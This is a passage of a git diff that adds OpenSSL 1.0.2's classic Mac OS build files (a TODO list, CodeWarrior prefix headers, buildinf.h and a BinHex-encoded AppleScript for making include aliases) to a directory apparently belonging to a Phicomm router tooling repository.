+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/TODO
@@ -0,0 +1,18 @@
+-------------------------------------------------------------------
+Verify server certificate
+-------------------------------------------------------------------
+Currently omitted from the project:
+
+	crypto/tmdiff.c
+	crypto/bio/bss_conn.c
+	crypto/bio/b_sock.c
+	crypto/bio/bss_acpt.c
+	crypto/bio/bss_log.h
+
+-------------------------------------------------------------------
+Build libraries to link with...
+-------------------------------------------------------------------
+Port openssl application.
+-------------------------------------------------------------------
+BN optimizations (currently PPC version is compiled with BN_LLONG)
+-------------------------------------------------------------------
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_GUSI_prefix.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_GUSI_prefix.h
new file mode 100644
index 0000000..6028920
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_GUSI_prefix.h
@@ -0,0 +1,9 @@
+#include <MacHeaders.h>
+#define B_ENDIAN
+#ifdef __POWERPC__
+# pragma longlong on
+#endif
+#if 1
+# define MAC_OS_GUSI_SOURCE
+#endif
+#define MONOLITH
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_prefix.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_prefix.h
new file mode 100644
index 0000000..eda14e8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/_MWERKS_prefix.h
@@ -0,0 +1,9 @@
+#include <MacHeaders.h>
+#define B_ENDIAN
+#ifdef __POWERPC__
+# pragma longlong on
+#endif
+#if 0
+# define MAC_OS_GUSI_SOURCE
+#endif
+#define MONOLITH
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/buildinf.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/buildinf.h
new file mode 100644
index 0000000..2e287c4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/buildinf.h
@@ -0,0 +1,5 @@
+#ifndef MK1MF_BUILD
+# define CFLAGS        "-DB_ENDIAN"
+# define PLATFORM      "macos"
+# define DATE          "Sun Feb 27 19:44:16 MET 2000"
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/mklinks.as.hqx b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/mklinks.as.hqx
new file mode 100644
index 0000000..fe3e7d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/MacOS/mklinks.as.hqx
@@ -0,0 +1,820 @@
+(This file must be converted with BinHex 4.0)
+
+:#QeVE'PZDh-ZBA-!39"36'&`E(3J!!!!!!!!!*LiI6m!!!!!!3!!!*G#!!#@3J!
+!!AChFQPd!!!!K3)"!3m(Fh9`F'pbG!!!!)B#!3%$"(0eFQ8!!!#(!J-%"!3("3C
+cGfPdBfJ!!!#)!J%"#39cH@jMD!!!!)N#"J%$!`-&"3-'FhPcG'9Y!!!!LJ)&"3)
+%!J8("!-#!`4dB@*X!!!!L`))!3-$!`-$!`-$"(4PE'`!!!#-!J)"#38$G'KP!!!
+!M3))(J)@!Ki#!J))!K)#!`)B!Kd%G'KPE3!!!)i#!J%&#`4dD'9j!!!!M`)#!J)
+#$3TdD(*[G@GSEh9d!!!!N!!#!3%&"(4TCQB!!!#4!J%"!`4dD@eP!!!!NJ)"!JS
+#!h4T!!!!'N!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!H!!!!!!!#!!!!!!
+!!!!!!!!!!!!!rrrrr`!!!$3!!!!N!!!!!#"[!!5JAb"[!!5K++!M6R9$9'mJFR9
+Z)(4SDA-JFf0bDA"d)'&`F'aTBf&dD@pZ,#"jEh8JEA9cG#"QDA*cG#"TER0dB@a
+X)%&`F'aP8f0bDA"d,J!!!)C8D'Pc)(0MFQP`G#"MFQ9KG'9c)#iZ,fPZBfaeC'8
+[Eh"PER0cE#"KEQ3JCQPXE(-JDA3JGfPdD#"ZC@0PFh0KFRNJB@aTBA0PFbi0$8P
+d)'eTCfKd)(4KDf8JB5"hD'PXC5"dEb"MEfe`E'9dC5"cEb"`E'9KFf8JBQ8JF'&
+dD@9ZG$SY+3!!!#S!!J!!!!!!$3!+!"!!!!!-!!!!!!!!!!!!63!0!!S!%!%!!!`
+!!!!!!!!!!!!B!!!!+!!!!!!!!!!)!!!!)!#N2c`!!DR`!!!!l!!!!!&19[ri,`0
+f!#m$-$bKVDG'*KmY52ri,`-`2+LITdBQ(b!ZrrLa`'FJ,`-J2'0`ER4"l[rm)NL
+KV5+)*Kp+3'B)5Ulrr'F#GJ%3!bBZrr41ANje6PB!!#m-@Bm[2%j29%Nr2!#!U"m
+SAb!-CJK`!cm!UFKJ+#m-UC)J9#!)d+J!'#&!!"JJ9#!)d+J!(#&!!"a9Mbm8)&q
+JAMk!9%mSE[rm6Pj1G8j@!!![$%kkre4+!'FU@Bm[2'&`E(3[2(0MF(4`)DJU+&m
+J$'F5@Bm[$#mm!!!!!A!!U#UTp&K26VVrG#KZrra1ANje!!!!('&`E(3!!!!"4P*
+&4J!!!!!!J%P$6L-!!!!!!*B!!!!"!!!!!!G"8&"-!!!!!!!"!!!"!!!!!S!!!!4
+!!!"i)!!!K"!!!3))!!)#"!!%"!)!#!J"!"!8!)!J)J"!3%%!)2#!J"#*!%!)KJ!
+J")3!)!*!!"!")!!3!K!!%!3)!"!)"!!J%!)!3#!"!)"!!S%!J!5#!3!)4!)!#%J
+%!!KB#!!%C"!!!m)J!!!"3!!!!)!!!!%!!!!$J!!!"m!!!(rJ!!$rm!!"rrJ!!rr
+m!!IrrJ!2rrm!(rrrJ$rrrm"rrrrJrrrrm2rrrrMrrrrmrrrrrRrrrrmrrrrq(rr
+rr!rrrrJ(rrr`!rrri!(rrm!$rrq!"rrr!!rrrJ!2rr`!$rri!!IRm!!$`q!!!!(
+!!!!!J!!!!!)!!!!!!!!!!!m!!!!!!!!!!!!!!!!!!!$`m!!!!!!!!!!!!!!!!!!
+2!!m!!!!!!!!!!!!!!!rrm!!!m!!!!!!!!!!!!!$`c0m!!!m!!!!!!!!!!!!2!!c
+-m!!!m!!!!!!!!!!!m!$-cI!!!!m!!!!!!!!!$`!-c0m!!!!!m!!!!!!!!2!!c-h
+`!!!!!!m!!!!!!!m!$-cIh`!!!!!!m!!!!!$`!-c0rGh`!!!!!!m!!!!2!!c-hph
+-h`!!!!!!m!!!rrr-cIhF`-h`!!!!!!m!!2lFr0rGc!`-h`!!!!!!m!$pc-rph-$
+!`-h`!!!!!!m!r-`2cF`-$!!-r3!!!!!!m!m!`-c!`-!!$0m!!!!!$-m!m!`-$!`
+!!-cI!!!!!-c`!!m!`-$!!!`-h`!!!!c2!!!!m!`-!!$!c0m!!!$-m!!!!!m!`!!
+-$-hm!!!-c`!!!!!!m!!!`-cIc!!!c2!!!!!!!!m!$!c0r-`!$-m!!!!!!!$pm-$
+-hmc!!-c`!!!!!!!2hI`-cIc-!!c2!!!!!!!!rGc2c0r-`!$-m!!!!!!!!2h-cmh
+mc!!-c`!!!!!!!!$mc!rIr-!!c2!!!!!!!!!!$m$2m!r-$-m!!!!!!!!!!!$rr`!
+!r-c`!!!!!!!!!!!!!!!!!!r2!!!!!!!!!!!!!!!!!!!!m!!!!!!!!!!!!!"!!B!
+13"%J)4"##18%Q)+3!%&!)5!L%%3BL#83*L!G3!#!!B!2`"rJ2r"rq2rmrrlrrhr
+r2riIr"ri2r!ri"h!!)!!!!#!!!!!$r!!!!!!!2r`$`!!!!!2$!m!m!!!!2$!c`!
+2!!!2$!c`!!$`!2r`cpm!!!m!rGrpc2!!!2$p$p`-c`!!$`m!`-$0m!$2!2!-$-h
+`$2!!$`$-hm$2!!!2m-hm$2!!!2h2hm$2!!!!r-rm$2!!!!!2r`r2!!!!!!!!!2!
+!!!!!!!#D8f0bDA"d)%&`F'aTBf&dD@pZ$3e8D'Pc)(0MFQP`G#"MFQ9KG'9c)#i
+Z,fPZBfaeC'8[Eh"PER0cE#"KEQ3JCQPXE(-JDA3JGfPdD#"ZC@0PFh0KFRNJB@a
+TBA0PFbi0$8Pd)'eTCfKd)(4KDf8JB5"hD'PXC5"dEb"MEfe`E'9dC5"cEb"`E'9
+KFf8JBQ8JF'&dD@9ZG$SY+3!!!")!!J!!!!!!!!!!!!%!"J!'%iN!!!!+@1!!!b!
+!!!-J!!!!!"3!+`!(!Cm#@!!V!!F"f!*B!!!!!3!!M`C'BA0N98&6)$%Z-6!a,M%
+`$J!!!!32rrm!!3!#!!-"rrm!!!d!!3!"D`!!!!!!!!!%!J!%!!)!"3!'$3!&!!*
+X!!)!!!U`!!IrrJd!"`!#6`!!!!!+X!!)!!N0!!J!!@X!!!!%#Um!#J)!#J!#!!X
+!$!d!#`!#E!!#!!3!"2rprr`"rrd!!!(rr!!!!J!-!!)!$3!1$3!0!!*X!!%!"!!
+%rrX!$`(rq`!!$!!2!&N!8b"(CA3JF'&dD#"dEb"dD'Pc)%&`F'aP8f0bDA"d)'&
+`F'aPG$XJGA0P)'Pd)(4[)'C[FQdJG'KP)("KG'JJG'mJG'KP)'PZBfaeC'8JCQp
+XC'9b!!)!!!)!$J!#!"!!%3d!%!!#E!!"!!3!"2rk!")"rrS!!!`!%J!Q!#!JB@j
+N)(4SC5"[G'KPFL"bC@aPGQ&ZG#"QEfaNCA*c,J!#!!!#!"%!!J!6!"30!"-!!R-
+!!!!%!"%!&3!@$3!9!!*M!!!!"!!1!"F!'!d!&`!#E!!&!!3!$!!CrrN0!"N!!Qi
+!!!!%!!`!'J!E$3!D!!)d!!!!"3!-rrJ!(!Vrq!!%#Q0[BQS0!"`!!Q`!"3!'!!X
+!(Irh$3!G!!0*!!)!"J!,rrB!([re#[rf!"JZC@&bFfCQC(*KE'Pc!!!!!!!!)!"
+KCQ4b$3!H!!"Q!!!!"J!(![re!!!"rrF!!!d!'`!"E3!!!!3!"3!I$`!I!6J)ER9
+XE!!!!!!!!Gq!rrm!!!!A"NCTEQ4PFJ!!(`*[Me!!ASfm!Qq,i!"HA[!!I&M!!!!
+!!!!!'mi!!JN#!Qq-1!!!Kb%#Ei`J!!!!!%C14&*038e"3e-!!"%!B@aTF`!!!!!
+!fJ!#!!!-6@&MD@jdEh0S)%K%!!!!!!!!!!!!!!!!!!!!XSA5h%*%!!!!!!!A"NC
+TEQ4PFJ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+!!!!!!!!!!!!!!!!!!!!!3rLc#@a!4Nj%8Ne"3e2rrrrr!!!!!!!!!!!!!!!!!!!
+!!!!!!!e6HA0dC@dJ4QpXC'9b!!!"!!3!!!!A!!)!)8eKBfPZG'pcD#")4$T6HA0
+dC@dJ4QpXC'9b1NCTEQ4PFJ$rr`!!!Irj!!!0!"J!!@d!!!!-!!hrp!Vrp!!%#Q0
+dH(30!"B!!@m!!!!!!!$rm`[rm`!5-!!(G'KPF'&dD!!(G'KP8'&dD!)!&!!#!#!
+!)3d!)!!#E!!#!")!%[rbrr%"rr)!!!(rm3!!!J!K!!)!)J!M$3!L!!*b!!!!%J!
+A!#3!*3d!*!!#EJ!$!")!&3!Q!#F0!#B!!6%!!!!6!"Arm!Vrm!!%#R4iC'`0!#F
+!!6%!!!!5!"2rl`Vrl`!%#Q&cBh)0!#8!!@m!!!!!!!$rlJ[rlJ!F-!!-G'KPEfa
+NC'9XD@ec!!adD'92E'4%C@aTEA-#!#-!!J!S!#N0!#J!!R)!!!!B!"d!+J!V$3!
+U!!&Y!!!!'!!C!#`-!#`!"`!"1J!#!!!0!#X!!Qi!!`!!!!!!,3!Z$3!Y!!%a!!!
+!'J!Frqd+rqd!"!TdH'4X$3!Z!!%a!!!!'3!Drq`+rq`!"!TKFf0b!J!T!!)!,`!
+`$3![!!*X!!)!(J!Hrq[rkJ(rk`!!!IrU!!!#!$!!!J!a!$)0!$%!!R)!!!!H!#X
+!-`!d$3!c!!*X!!8!(J!T!$Ark3d!03!#EJ!!!"i!+3!f!$F0!$B!!cF"!!!I!#R
+rk!!i!$N+rqJ!"!TMDA4Y$3!i!!&Y!!!!)`!PrqF$rqF!!3d!13!"E3!!!#B!+2r
+Q!rrQrrd0!$F!!@m!!!!H!"rrj3[rj3!5-!!(G'KPF'&dD!!(G'KP8'&dD!(rk3!
+!$3!d!!&[!!!!!!!!rq3,rq3!)$!!$R4SCA"bEfTPBh4`BA4S!!jdD'93FQpUC@0
+d8'&dD!)!-J!#!$S!1`d!1J!#FJ!!!#`!1`!m!$d0!$`!!Q-!!!!X!$N!2J!r$3!
+q!!*X!!8!,!!h!%$ri`d!3!!#EJ!!!#`!0`""!%)0!%%!!cF"!!!Y!$IriJ"$!%3
++rq)!"!TMDA4Y$3"$!!&Y!!!!-3!crq%$rq%!!3d!4!!"E3!!!$3!0[rJ!rrJrri
+0!%)!!@m!!!!X!#hrh`[rh`!5-!!(G'KPF'&dD!!(G'KP8'&dD!(ri`!!$3!r!!&
+Y!!!!0`!irpi+rpi!"!T849K8$3!p!!&[!!!!!!!!rpd,rpd!&M!!#A4SC@ePF'&
+dD!!*G'KP6@93BA4S!J!l!!)!43"'$3"&!!*X!!)!2!!mrpcrf`(rh!!!!IrE!!!
+#!%B!!J"(!%J0!%F!!R)!!!!m!%8!53"+$3"*!!*M!!!!2!""!%X!6!d!5`!#BJ!
+!!$`!2`"0!%i0!%d!!@m!!!!m!$hrfJ[rfJ!J-!!1G'KPF(*[DQ9MG("KG'J!$R4
+SC9"bEfTPBh43BA4S$3"1!!&Y!!!!23!q!%m-!%m!$3!(D@jME(9NC3!#!!!0!%`
+!!@d!!!!r!%$rf3Vrf3!%#P4&@&30!%S!!@m!!!!!!!$rf![rf!!Q-!!4D@jME(9
+NC@C[E'4PFR"KG'J!%@PZBfaeC'9'EfaNCA*3BA4S!J")!!)!8!"4$3"3!!*b!!!
+!4J"9!&)!8`d!8J!#B`!!!%B!83"8!&80!&3!!Q)!!!"'!%m!9J"A$3"@!!*L!!!
+!4J",!&J!@3d!@!!"E`!!!%B!4rrA#rrA!#!`!!jdD'9`FQpUC@0dF'&dD!!1G'K
+P8(*[DQ9MG&"KG'J0!&N!!@d!!!"(!%S!@J`!@J!0!!GTEQ0XG@4P!!)!!!d!9`!
+"E3!!!%X!6J"E$!"E!!d!"fp`C@jcFf`!!J!!$3"9!!&Y!!!!6`"3rpB+rpB!"!T
+849K8$3"6!!&[!!!!!!!!rp8,rp8!0$!!''p`C@jcFfaTEQ0XG@4PCQpXC'9bF'&
+dD!!BEh"PEP066%PZBfaeC'9'EfaNCA*3BA4S!J"4!!)!A!"G$3"F!!*b!!!!9J"
+K!&i!A`d!AJ!#B`!!!&B!A3"J!'%0!'!!!Q)!!!"@!&X!BJ"M$3"L!!&[!!!!9J"
+Arp3,rp3!)$!!$R4SCA"bEfTPBh4`BA4S!!jdD'93FQpUC@0d8'&dD!d!B`!"E3!
+!!&F!@J"N$!"N!!`!"Q0bHA"dE`!#!!!0!'%!!@d!!!"E!&crd`Vrd`!%#P4&@&3
+0!&m!!@m!!!!!!!$rdJ[rdJ!N-!!3Bh*jF(4[CQpXC'9bF'&dD!!3Bh*jF(4[4Qp
+XC'9b8'&dD!)!A3!#!'8!CJd!C3!#FJ!!!')!E3"R!'J0!'F!!Q-!!!"L!'N!D3"
+U$3"T!!*L!!!!BJ"R!'X!E!d!D`!"E`!!!')!Brr4#rr4!#!`!!jdD'9`FQpUC@0
+dF'&dD!!1G'KP8(*[DQ9MG&"KG'J0!'`!!@d!!!"M!'B!E3`!E3!*!!0cFf`!!J!
+!$3"U!!&Y!!!!C`"Srp!+rp!!"!T849K8$3"S!!&[!!!!!!!!rmm,rmm!(M!!$A0
+cE'C[E'4PFR"KG'J!$A0cE%C[E'4PFP"KG'J#!'B!!J"Z!'m0!'i!!R)!!!"Z!(8
+!F!"a$3"`!!*M!!!!EJ"a!()!F`d!FJ!"E`!!!'i!Err1#rr1!#!`!!jdD'9`FQp
+UC@0dF'&dD!!1G'KP8(*[DQ9MG&"KG'J0!(-!!@d!!!"[!($rc3Vrc3!%#P4&@&3
+0!(%!!@m!!!!!!!$rc![rc!!Q-!!4Eh"PER0cE'C[E'4PFR"KG'J!%@p`C@jcFfa
+'EfaNCA*3BA4S!J"[!!)!G!"e$3"d!!*X!!)!GJ"frm[rbJ(rb`!!!Ir+!!!#!(8
+!!J"f!(F0!(B!!R)!!!"f!(X!H!"j$3"i!!&[!!!!GJ"hrmN,rmN!($!!$(4SC@p
+XC'4PE'PYF`!-G'KP6faN4'9XD@ec$3"j!!*Z!!-!!!!!!(S!H`d!HJ!"-3!!!(J
+!H[r)#[r)!!3+G(KNE!d!H`!"-3!!!(F!H2r(#[r(!!3+BA0MFJ)!G`!#!(`!I3d
+!I!!#E!!#!(`!I2r'rm8"rmB!!!(ra3!!!J"p!!)!IJ"r$3"q!!*X!!%!I!"mrm3
+!J!(ra!!!$!#!!%!!1L"NC@aPG'8JEfaN)'PZBfaeC'8kEh"PER0cE#"QEfaNCA)
+JB@jN)(*PBh*PBA4P)'Pd)'0XC@&ZE(N!!J!!!J"r!!)!J3##$3#"!!*X!!)!I!"
+mrm2r`J(r``!!!Ir#!!!#!))!!J#$!)30!)-!!e%!!!"m!+8!K3#'!)F0!)8!!@X
+!!!"r!*`!L!)!L!!#!)N!LJd!L3!$53!#!(m!N[r"!)[r`!Vr`3!B,QeTFf0cE'0
+d+LSU+J!!!!!!!*!!!#SU+LS0!)X!!Qi!!!"r!)i!M!#0$3#-!!)d!!!!K`#1rlm
+!MJVr[`!%#Q0QEf`0!)i!!@d!!!#+!)d!M``!M`!0!!G[F'9ZFh0X!!)!!!d!M3!
+#0!!!!(m!Krqq!*!!#[qq!!3+BfC[E!d!N!!!!@m!!!#$!)Er[3[r[3!Q-!!4D@j
+ME(9NC@C[E'4PFR"KG'J!%@PZBfaeC'9'EfaNCA*3BA4S![r!!!!#!)S!!J#4rl`
+0!*%!!dN!!J#6!*crZ`#5rlS+rlX!'#jMEh*PC'9XEbSU+LS!!!!!!!#3!!!U+LS
+U$3#5!!%a!!!!N`#BrlN+rlN!"!TcC@aP![qk!!!#rl`!!!d!KJ!$8J!!!!!!!2q
+irlIrYJVrZ!!B,Q&cBh*PFR)J+LSU+J!!!!!!!*!!!#SU+LS"rlF!!!,rYJ!!$3#
+(!!*X!!%!T!#Nrl8!N`(rY3!!$!#6!"-!$5"TCfj[FQ8JCA*bEh)!!J!!!J#%!!)
+!P!#9$3#8!!*X!!)!TJ#Qrl6rX`(rY!!!!Iqc!!!#!*8!!J#@!*F0!*B!!dN!!J#
+Q!,lrX[qa!*J+rl)!'#jMEh*PBh*PE#SU+LS!!!!!!!#3!!"ZG@aX!Iqa!!!'!*J
+!!rq`!*N!QJVrX!!%#QY[Bf`0!*N!!@d!!!#U!+hrV`VrV`!%#Q0QEf`'!*S!!rq
+Z!*[rV3VrVJ!%#QPZFfJ0!*X!!M3!!!#`!,MrV!#F#[qX!!3+BfC[E!d!R!!"E`!
+!!,3!YrqV#rqV!#B`!"&TEQ0XG@4PCQpXC'9bF'&dD!!4D@jME(9NC8C[E'4PFP"
+KG'J'rkd!!!)!P`!#!*d!RJd!R3!#FJ!!!,m!aJ#I!+!0!*m!!Q`"!!#r!-)!SIq
+U$3#K!!%a!!!![`$#rkN+rkN!"!TbFfad!IqU!!!0!+!!!@m!!!!!!!$rU![rU!!
+Z-!!9G'KPEQ9hCQpXC'9bFQ9QCA*PEQ0P!"9dD'91CAG'EfaNCA*5C@CPFQ9ZBf8
+#!*i!!J#L!+-0!+)!!dN!!J$(!-lrT`#NrkB+rkF!'#jYDA0MFfaMG#SU+LS!!!!
+!!!#3!!!U+LSU$3#N!!&[!!!!a`$+rk8,rk8!,M!!&A4SC@jPGfC[E'4PFR*PCQ9
+bC@jMC3!9G'KP6Q9h4QpXC'9b8Q9QCA*PEQ0P![qQ!!!#!+-!!J#P!+B0!+8!!R)
+!!!$2!0`!T`#S$3#R!!&Y!!!!c`$5!+N-!+N!$3!(Eh"PER0cE!!#!!!0!+J!!Qi
+!!!!!!!!!UJ#V$3#U!!%a!!!!e`$Erk3+rk3!"!T`EQ&Y$3#V!!%a!!!!dJ$Ark-
++rk-!"!TcC@aP!J#Q!!)!V!#Y$3#X!!*X!!)!h3$Grk,rS3(rSJ!!!IqK!!!#!+d
+!!J#Z!+m0!+i!!Q`!!3$G!0hrS!#`!IqJ!!!-!,!!(`!C)&0dBA*d)'eKDfPZCb"
+dD'8JB@aTBA0PF`!#!!!#!+m!!J#a!,)0!,%!!dN!!J$G!3ArRrqH!,-+rjm!'#j
+MEh*PBh*PE#SU+LS!!!!!!!#3!!"ZG@aX!IqH!!!'!,-!!rqG!,3!Y3VrR3!%#QY
+[Bf`0!,3!!@d!!!$K!16rR!VrR!!%#Q&XD@%'!,8!!rqE!,B!Y`VrQ`!%#QPZFfJ
+0!,B!!M3!!!$R!1rrQJ#i#[qD!!3+BfC[E!d!Z!!"E`!!!1X!l[qC#rqC!$3`!"K
+[F'9ZFh0XD@jME(9NC@C[E'4PFR"KG'J!''p`C@j68da*EQ0XG@4P4QpXC'9b8'&
+dD!B!Y`!$rjJ!ZIqA#[qB!!3+G'mJ)!d!Z3!#EJ!!!2)!r`#k!,X0!,S!!M3!!!$
+i!2rrPJ#m#[q@!!3+CQPXC3d![!!"E3!!!2X!rJ#p$!#p!"-!$@p`C@jcFfaMEfj
+Q,QJ!!J!!$3#l!!)d!!!!mJ$irj8![JVrP3!%#Q0QEf`0!,i!!@m!!!$f!2IrP![
+rP!!@-!!*G'KPE@9`BA4S!!PdD'90C9"KG'J'rjF!!!)!XJ!#!,m!`!d![`!#E!!
+#!3B""[q6rj)"rj-!!!(rNJ!!!J$!!!)!`3$#$3$"!!*b!!!""J%4!--!a!d!``!
+#BJ!!!3B"$3$&!-B0!-8!!@m!!!%'!3RrN3[rN3!N-!!3Bh*jF(4[CQpXC'9bF'&
+dD!!3Bh*jF(4[4QpXC'9b8'&dD!d!aJ!"E3!!!3N"$!$($!$(!!X!"6TKFfia!!)
+!!!d!a!!"E`!!!!!!!2q3!![rN!!!&$!!#(4PEA"`BA4S!!KdC@e`8'&dD!)!`J!
+#!-J!b3d!b!!$53!#!4)"22q2rii!bJVrM`!B,Q0[FQ9MFQ9X+LSU+J!!!!!!!*!
+!!'jeE'`"rii!!!B!bJ!$rid!b`$-#[q0!!3+DfpME!d!b`!"E3!!!4B"'Iq-#[q
+-!!3+B@aTB3B!c!!$riX!c3$1#[q,!!3+D@jcD!d!c3!#0!!!!4`"*2q+!-m+riS
+!"!TMCQpX$3$2!!&[!!!")!%MriN,riN!0$!!''p`C@jcFfaTEQ0XG@4PCQpXC'9
+bF'&dD!!BEh"PEP066%PZBfaeC'9'EfaNCA*3BA4S"J$1!!2rL!$3riF+riJ!"!T
+dEb!J$3$3!!*Z!!!"*`%f!0%!dJd!d3!#0!!!!5m"0[q'!0-+riB!"!TQD@aP$3$
+6!!&Y!!!"-J%e!03-!03!$!!'BA0Z-5jS!!)!!!d!dJ!#0!!!!5F",rq&!08+ri8
+!"!TMCQpX$3$9!!&[!!!"+`%Zri3,ri3!&$!!#(4PEA"`BA4S!!KdC@e`8'&dD!E
+rK`!!!J$*!!)!eJ$A$3$@!!0*!!)"23&Rri2rJJ$B#[q$!"JZBfpbC@0bC@`U+LS
+U!!!!!!!!N!!!ER9XE!(rJJ!!"J$B!!2rJ3$C!0S+ri%!"!TVEf0X$3$C!!&Y!!!
+"33&%ri!+ri!!"!TKE'PK"J$D!!2rI`$E!0`+rhm!"!TTER0S$3$E!!)d!!!"4`&
+2rhi!h3VrIJ!%#Q0QEf`0!0d!!@m!!!&,!8lrI3[rI3!d-!!BEh"PER0cE'PZBfa
+eC'9QEfaNCA*`BA4S!"K[F'9Z8e0-5@jME(9NC8C[E'4PFP"KG'J'!0`!!rpm!0l
+rH`VrI!!%#R4[)#!0!0i!!Qi!!!&5!@%!h`$J$3$I!!)d!!!"@J&KrhS!i3VrHJ!
+%#QCTE'80!1%!!@d!!!&G!@!!iJ`!iJ!3!!TKFfiaAfeKBbjS!!)!!!d!i!!#0!!
+!!9)"@[pj!1-+rhN!"!TMCQpX$3$M!!&[!!!"9J&CrhJ,rhJ!&$!!#(4PEA"`BA4
+S!!KdC@e`8'&dD!ErH`!!!J$A!!)!j!$P$3$N!!*X!!)"D!&SrhIrGJ(rG`!!!Ip
+f!!!#!18!!J$Q!1F0!1B!!R)!!!&S!A-!k!$T$3$S!!*L!!!"D!&[!1S!k`d!kJ!
+"E`!!!@J"Drpe#rpe!#3`!""MFRP`G'pQEfaNCA*`BA4S!""MFRP`G'p'EfaNCA*
+3BA4S$3$V!!&Y!!!"D`&Z!1`-!1`!#J!%1Q*TE`!#!!!0!1N!!@m!!!!!!!$rG![
+rG!!8-!!)G'9YF("KG'J!#(4PEA"3BA4S!J$R!!)!l3$Z$3$Y!!0*!!)"G!'Hrh2
+rFJ$[#[pc!"JZBfpbC@0bC@`U+LSU!!!!!!!!N!!!ER9XE!(rFJ!!"J$[!!2rF3$
+`!2%+rh%!"!TVEf0X$3$`!!&Y!!!"H!&lrh!+rh!!"!TKE'PK"J$a!!2rE`$b!2-
++rfm!"!TTER0S$3$b!!)d!!!"IJ''rfi!p!VrEJ!%#Q0QEf`0!23!!@m!!!'#!BA
+rE3[rE3!d-!!BEh"PER0cE'PZBfaeC'9QEfaNCA*`BA4S!"K[F'9Z8e0-5@jME(9
+NC8C[E'4PFP"KG'J'!2-!!rpX!2ArD`VrE!!%#R4[)#!0!28!!Qi!!!'*!CJ!pJ$
+h$3$f!!)d!!!"N3'BrfS!q!VrDJ!%#QCTE'80!2J!!@d!!!'8!CF!q3`!q3!,!!9
+LD@mZD!!#!!!0!2F!!M3!!!'*!C(rD3$k#[pT!!3+BfC[E!d!qJ!"E`!!!Bd"N!$
+rD![rD!!8-!!)G'9YF("KG'J!#(4PEA"3BA4S"[pV!!!#!1i!!J$l!2`0!2X!!Q`
+!!J'I!CrrCrpQ!IpR!!!"rfB!!!)!r!!#!2d!rJd!r3!#FJ!!!Cm"UJ$r!3!0!2m
+!!Q)!!!'I!DB"!3%#$3%"!!&[!!!"R`'Lrf8,rf8!*$!!%'0bHA"dEfC[E'4PFR"
+KG'J!%'0bHA"dEdC[E'4PFP"KG'J0!3)!!@d!!!'L!D8"!``"!`!*!!-kBQB!!J!
+!$3%!!!&[!!!!!!!!rf3,rf3!&$!!#(4PEA"`BA4S!!KdC@e`8'&dD!)!rJ!#!33
+""3d""!!$53!#!DX"eIpMrf)""JVrB`!B,Q0[FQ9MFQ9X+LSU+J!!!!!!!*!!!'j
+eE'`"rf)!!!B""J!$rf%""`%)#[pK!!3+DfpME!d""`!"E3!!!Dm"X[pJ#[pJ!!3
++B@aTB3B"#!!$rem"#3%+#[pI!!3+D@jcD!d"#3!#0!!!!E8"[IpH!3X+rei!"!T
+MCQpX$3%,!!&[!!!"Z3'mred,red!0$!!''p`C@jcFfaTEQ0XG@4PCQpXC'9bF'&
+dD!!BEh"PEP066%PZBfaeC'9'EfaNCA*3BA4S"J%+!!2rA!%-reX+re`!"!TdEb!
+J$3%-!!*Z!!!"`!(2!3d"$Jd"$3!#0!!!!FJ"crpD!3m+reS!"!TQD@aP$3%2!!&
+Y!!!"b`(1!4!-!4!!%!!+BQa[GfCTFfJZD!!#!!!0!3i!!M3!!!(!!FMr@3%4#[p
+C!!3+BfC[E!d"%3!"E`!!!F3"arpB#rpB!"3`!!KdC@e`F'&dD!!)G'9YF&"KG'J
+'reX!!!)""3!#!4)"%`d"%J!#E!!#!GB"e[pAreB"reF!!!(r9J!!!J%6!!)"&!%
+9$3%8!!*b!!!"eJ(K!4B"&`d"&J!#BJ!!!GB"h3%B!4N0!4J!!@m!!!(@!GRr93[
+r93!N-!!3Bh*jF(4[CQpXC'9bF'&dD!!3Bh*jF(4[4QpXC'9b8'&dD!d"'3!"E3!
+!!GN"h!%D$!%D!!N!!cTLEJ!#!!!0!4F!!@m!!!!!!!$r9![r9!!8-!!)G'9YF("
+KG'J!#(4PEA"3BA4S!J%9!!)"'`%F$3%E!!0*!!)"iJ)-re2r8J%G#[p6!"JZBfp
+bC@0bC@`U+LSU!!!!!!!!N!!!ER9XE!(r8J!!"J%G!!2r83%H!4m+re%!"!TVEf0
+X$3%H!!&Y!!!"jJ(Tre!+re!!"!TKE'PK"J%I!!2r6`%J!5%+rdm!"!TTER0S$3%
+J!!)d!!!"l!(drdi")JVr6J!%#Q0QEf`0!5)!!@m!!!(`!I2r63[r63!d-!!BEh"
+PER0cE'PZBfaeC'9QEfaNCA*`BA4S!"K[F'9Z8e0-5@jME(9NC8C[E'4PFP"KG'J
+'!5%!!rp-!52r5`Vr6!!%#R4[)#!0!5-!!Qi!!!(h!JB"*!%P$3%N!!)d!!!"r`)
+'rdS"*JVr5J!%#QCTE'80!5B!!@d!!!)#!J8"*``"*`!+!!4LELjS!!)!!!d"*3!
+#0!!!!IF"rrp*!5J+rdN!"!TMCQpX$3%S!!&[!!!"q`(qrdJ,rdJ!&$!!#(4PEA"
+`BA4S!!KdC@e`8'&dD!Er5`!!!J%F!!)"+3%U$3%T!!*X!!)#$3)0rdIr4J(r4`!
